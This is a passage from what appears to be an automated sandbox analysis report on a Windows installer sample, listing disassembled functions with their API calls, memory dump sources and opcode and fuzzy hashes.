                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                                                                                                                                                                                                                                              Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                                              • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                                                                                                                                                                                                              • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                                                                                                                                                                                                                                              Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                                              • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                                                                                                                                                                                                              • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                                                                                                                                                                                                                                              Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                                              • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                                              • String ID: !N~
                                                                                                                                                                                                                                                                                              • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                                              • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                                                                                                                                                                                                              • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                                                                                                                                                                                                                                              Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              • Error launching installer, xrefs: 00405C48
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                              • String ID: Error launching installer
                                                                                                                                                                                                                                                                                              • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                                              • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                                                                                                                                                                                                              • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                                                                                                                                                                                                                                              Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                                              • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                                                • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                                              • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                              • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                                              • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                                                                                                                                                                                                              • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                                                                                                                                                                                                                                              Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                                                                                                                                                                                                                                              • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                                                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                                                                                                                                                                              • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                                                                                                                                                                                                              • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4